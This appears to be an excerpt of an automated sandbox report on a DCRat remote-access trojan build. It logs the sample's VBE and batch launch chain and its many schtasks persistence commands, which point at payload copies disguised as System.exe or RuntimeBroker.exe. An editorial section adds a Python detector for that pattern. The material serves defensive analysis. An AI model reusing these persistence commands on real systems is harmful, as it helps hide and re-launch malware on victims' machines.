            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8CB60
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D75C77
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D7FDFA
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D73D6D
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6ED14
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6DE6C
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D6BE13
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D80F78
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D65F3C
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD344704D3
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD34470498
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Code function: 6_2_00007FFD34470515
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34487AB2
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34492770
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449FF90
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344980AD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A28B0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A90B2
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34499088
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344959BD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344971BD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449524D
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344911F1
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344B0322
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A8306
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34496301
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449E380
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34493C28
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34494CA9
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A0E55
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449B725
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A5724
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344947C0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A5FFD
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344920B4
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344990D0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449A862
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449C08B
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34494929
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A1101
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344AE1A7
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344AE230
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449F1F0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344AE285
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344AE327
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A7B05
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34494B79
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD3449BB98
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344994A0
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34493C50
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34494C08
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344804D3
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34480498
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD34480515
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Code function: 20_2_00007FFD344A2818
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Code function: 23_2_00007FFD344904D3
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD344604D3
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 24_2_00007FFD34460498
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD344804D3
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD34480498
            Source: C:\Program Files\7-Zip\Lang\System.exe | Code function: 26_2_00007FFD34480515
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: String function: 00D7E360 appears 52 times
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: String function: 00D7ED00 appears 31 times
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: String function: 00D7E28C appears 35 times
            Source: portperf.exe.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: dfVXJbANbh.exe.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: dfVXJbANbh.exe0.6.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: DCRatBuild.exe, 00000000.00000003.2137305380.0000000006840000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000002.2142565234.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2141483616.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2138988212.000000000714C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe, 00000000.00000003.2138544579.0000000007142000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe | Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs DCRatBuild.exe
            Source: DCRatBuild.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, lXmetBmZ2od6uQ9gUad.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, T8FCuuYe5ynxfEF8Wit.cs | Cryptographic APIs: 'CreateDecryptor'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lXmetBmZ2od6uQ9gUad.cs | Cryptographic APIs: 'TransformBlock'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, lXmetBmZ2od6uQ9gUad.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DCRatBuild.exe.688d543.0.raw.unpack, uxL8lxfUvgFnXycRaue.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uxL8lxfUvgFnXycRaue.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, uxL8lxfUvgFnXycRaue.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@46/27@1/1
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D66EC9 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D79E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File created: C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File created: C:\Users\Public\Music\dfVXJbANbh.exe
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
            Source: C:\Program Files\7-Zip\Lang\System.exe | Mutant created: NULL
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\f541aaea6d2bf9223ceae6326c30278ad0839797
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File created: C:\Users\user\AppData\Local\Temp\p0UyIgWlzy
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Command line argument: sfxname | 0_2_00D7D5D4
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Command line argument: sfxstime | 0_2_00D7D5D4
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Command line argument: STARTDLG | 0_2_00D7D5D4
            Source: DCRatBuild.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: DCRatBuild.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (logged 27 times)
            Source: C:\Users\user\Desktop\DCRatBuild.exe | File read: C:\Windows\win.ini
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: DCRatBuild.exe | ReversingLabs: Detection: 63%
            Source: DCRatBuild.exe | Virustotal: Detection: 54%
            Source: C:\Users\user\Desktop\DCRatBuild.exe | File read: C:\Users\user\Desktop\DCRatBuild.exe
            Source: unknown | Process created: C:\Users\user\Desktop\DCRatBuild.exe "C:\Users\user\Desktop\DCRatBuild.exe"
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBlocksurrogateagentFont\IQYI1ZQqki4.vbe"
            Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBlocksurrogateagentFont\qVwtNBtq7doCC7qZCII8cJUJd.bat" "
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\ChainBlocksurrogateagentFont\portperf.exe "C:\ChainBlocksurrogateagentFont\portperf.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknown | Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\dfVXJbANbh.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknown | Process created: C:\Users\Default\Videos\dfVXJbANbh.exe "C:\Users\Default User\Videos\dfVXJbANbh.exe"
            Source: unknown | Process created: C:\Program Files\7-Zip\Lang\System.exe "C:\Program Files\7-Zip\Lang\System.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 8 /tr "'C:\Users\Default User\Videos\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: unknown | Process created: C:\Program Files\7-Zip\Lang\System.exe "C:\Program Files\7-Zip\Lang\System.exe"
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 6 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows multimedia platform\dfVXJbANbh.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 8 /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LHgpusyvSo.bat"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
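The process list above shows the persistence routine end to end: portperf.exe calls schtasks /create with /f over and over, pairing a short MINUTE trigger with an ONLOGON trigger at /rl HIGHEST, and points each task at a copy of the payload under a Program Files subdirectory, the Public or Default user profile, C:\Windows\SystemTemp or a made-up top-level directory, with some copies named System.exe or RuntimeBroker.exe. The batch file it drops then calls w32tm /stripchart against localhost, which is a delay rather than a time sync. The Python below is an added detection example written for this page; it is not part of the Joe Sandbox report or of any DCRat tooling. It runs those rules over process-creation command lines (the CommandLine field of Sysmon Event ID 1 or Security 4688). The trusted-root list, the staging-directory hints, the imitated process names and the 15-minute watchdog threshold are the editor's assumptions; the sample input is constructed from command lines quoted in the report plus one benign task creation as the negative case.

```python
import re
from collections import defaultdict

# Assumed lists and thresholds (editor's choices, not taken from the report):
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")  # expected homes of scheduled system binaries
KNOWN_ROOT_DIRS = {"windows", "program files", "program files (x86)", "users", "programdata"}
SYSTEM_PROCESS_NAMES = {"system", "runtimebroker", "svchost", "lsass", "csrss", "winlogon"}  # cf. System.exe, RuntimeBroker.exe above
STAGING_HINTS = ("\\users\\public\\", "\\users\\default", "\\appdata\\local\\temp\\", "\\windows\\systemtemp\\")
WATCHDOG_MINUTES = 15  # a MINUTE trigger at or below this interval is a watchdog, not a job

_TOKEN = re.compile(r'"[^"]*"|\S+')               # one quoted argument or one bare word
_EXE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)  # executable part of a /tr value
_ROOT_DIR = re.compile(r"^[a-z]:\\([^\\]+)\\")    # first directory under the drive root


def parse_schtasks(cmdline):
    """Switch -> value map for a 'schtasks /create' line (/f etc. map to ''), else None."""
    tokens = _TOKEN.findall(cmdline)
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1] if tokens else ""
    if image not in ("schtasks", "schtasks.exe"):
        return None
    args, i = {}, 1
    while i < len(tokens):
        key = tokens[i].lower()
        if key.startswith("/"):
            if i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                args[key] = tokens[i + 1].strip('"').strip("'")  # "'path'" -> path
                i += 1
            else:
                args[key] = ""
        i += 1
    return args if "/create" in args else None


def assess_task(cmdline):
    """(task_name, target, reasons) for a creation matching the persistence pattern, else None."""
    args = parse_schtasks(cmdline)
    if args is None:
        return None
    m = _EXE.match(args.get("/tr", ""))
    target = m.group(1).lower() if m else ""
    if not target or target.startswith(TRUSTED_ROOTS):
        return None  # System32 targets are out of scope for these rules
    strong, context = [], []
    if args.get("/sc", "").upper() == "MINUTE" and args.get("/mo", "1").isdigit():
        every = int(args.get("/mo", "1"))  # schtasks defaults /mo to 1
        if every <= WATCHDOG_MINUTES:
            strong.append(f"re-launched every {every} min")
    base = target.rsplit("\\", 1)[-1][:-4]  # file name without .exe
    if base in SYSTEM_PROCESS_NAMES:
        strong.append(f"system process name {base}.exe outside System32")
    if any(hint in target for hint in STAGING_HINTS):
        strong.append("target in a user-writable staging directory")
    root = _ROOT_DIR.match(target)
    if root and root.group(1) not in KNOWN_ROOT_DIRS:
        strong.append(f"target under non-standard top-level directory {root.group(1)}")
    if args.get("/rl", "").upper() == "HIGHEST":
        context.append("/rl HIGHEST")
    if "/f" in args:
        context.append("/f overwrites any existing task of that name")
    # /rl HIGHEST and /f alone are common in legitimate installers: context, not a trigger.
    return (args.get("/tn", ""), target, strong + context) if strong else None


def is_w32tm_delay(cmdline):
    """w32tm /stripchart against localhost syncs nothing; LHgpusyvSo.bat above uses it as a sleep."""
    low = cmdline.lower()
    return "w32tm" in low and "/stripchart" in low and "/computer:localhost" in low


def scan(cmdlines):
    """Per-line findings plus task names created more than once (the /f overwrite loop
    in the report), which also catches ONLOGON variants below threshold on their own."""
    findings, creations = [], defaultdict(int)
    for line in cmdlines:
        args = parse_schtasks(line)
        if args:
            creations[args.get("/tn", "")] += 1
        finding = assess_task(line)
        if finding:
            findings.append(finding)
    return findings, {name: n for name, n in creations.items() if n > 1}


# Constructed sample: six command lines copied from the report above, the batch
# file's w32tm call, and one benign creation (assumed) as the negative case.
SAMPLE_COMMAND_LINES = [
    r'''schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f''',
    r'''schtasks.exe /create /tn "dfVXJbANbh" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 14 /tr "'C:\Users\Public\Music\dfVXJbANbh.exe'" /f''',
    r'''schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\System.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 7 /tr "'C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe'" /f''',
    r'''schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2''',
    r'''schtasks.exe /create /tn "NightlyBackup" /sc DAILY /st 02:00 /tr "C:\Windows\System32\wbadmin.exe start backup"''',
]

if __name__ == "__main__":
    found, churn = scan(SAMPLE_COMMAND_LINES)
    for name, target, reasons in found:
        print(f"[task] {name} -> {target}: {'; '.join(reasons)}")
    for name, n in churn.items():
        print(f"[churn] task {name} created {n} times")
    print("[delay]", [line for line in SAMPLE_COMMAND_LINES if is_w32tm_delay(line)])
```

Two design points. The ONLOGON task that points into a Program Files subdirectory with /rl HIGHEST (the second sample line) deliberately does not trip the per-line rules, because installers create exactly that shape; it is caught by the churn count, since the same task name is re-created against several paths, which no installer does. And the w32tm rule keys on /computer:localhost rather than on w32tm itself, because w32tm is legitimately run by administrators against real time sources.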
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Section loaded: api-ms-win-core-synch-l1-2-0.dll
